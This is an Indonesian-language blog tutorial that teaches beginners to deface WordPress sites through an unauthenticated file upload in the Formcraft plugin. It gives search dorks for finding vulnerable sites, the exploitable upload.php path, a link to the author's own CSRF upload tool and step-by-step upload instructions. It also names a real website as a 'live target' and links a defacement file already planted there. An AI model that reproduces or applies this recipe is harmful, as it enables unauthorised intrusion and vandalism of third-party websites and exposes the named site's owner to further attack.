Deface WordPress Plugin Formcraft + Live Target

WordPress Deface

Hallo all, pada artikel kali ini mimin akan memberikan tutorial deface dengan metode plugin wordpress formcraft. Metode ini sangat gampang kok, dan pastinya cocok buat pemula yang ingin belajar deface.

Langsung aja ga usah basa-basi, skuy-skuy..

Hal yang diperlukan

- Script deface ekstensi : .txt (soalnya gabisa upload ekstensi seperti .html .php .phtml dll)

- Dork

• inurl:/wp-content/plugins/formcraft/
• inurl:/wp-content/plugins/formcraft/file-upload/server/content/

- CSRF Online disini mimin pake punya sendiri, linknya dibawah

• http://lightcyberindonesia.dx.am/tools/csrf.php

- Exploit : site.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php

Tutorial

- Cari target pakai dork diatas, lalu masukkan exploit. Jika tampilan seperti screenshot dibawah, itu tandanya website bisa di eksekusi (vuln)

- Langsung pergi ke CSRF Online tadi, masukkan website nya disitu dan isi Filedatanya dengan files[] (lihat screenshot)

- Pilih file deface .txt kalian, lalu upload.

- Maka hasil akan seperti screenshot dibawah, akan muncul angka random beserta nama file deface kalian.

- Akses dengan menambahkan /files/namafile.txt

- Dan deface pun berhasil

Nah, gampang bukan tutorial deface ini? Untuk belajar sudah disediakan dua live target dibawah.

Live Target :

• http://www.fattyweng.com.sg/wp-content/plugins/formcraft/file-upload/server/content/upload.php
• http://www.fattyweng.com.sg/wp-content/plugins/formcraft/file-upload/server/content/upload.php

Hasilnya :

• http://www.fattyweng.com.sg/wp-content/plugins/formcraft/file-upload/server/content/files/15e9460f7b661c---oh.txt
• http://www.fattyweng.com.sg/wp-content/plugins/formcraft/file-upload/server/content/files/15e9460f7b661c---oh.txt